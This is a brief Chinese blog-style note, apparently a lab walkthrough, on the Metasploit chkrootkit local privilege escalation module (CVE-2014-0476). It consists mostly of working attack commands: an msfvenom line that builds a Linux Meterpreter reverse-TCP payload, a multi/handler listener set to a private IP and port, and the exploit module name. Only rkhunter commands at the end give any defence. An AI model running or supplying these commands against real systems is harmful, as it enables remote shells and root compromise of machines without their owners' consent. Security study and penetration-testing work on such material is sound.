exploit/unix/local/chkrootkit

2022-05-21 19:00:59 浏览数 (1)

代码语言:javascript复制
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.63.142 lport=4545 -f elf > shell



use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.63.142
set lport 4545
exploit -j


exploit/unix/local/chkrootkit
CVE-2014-0476


apt  install -y rkhunter
rkhunter --update
rkhunter --propupd
rkhunter --check --sk

0 人点赞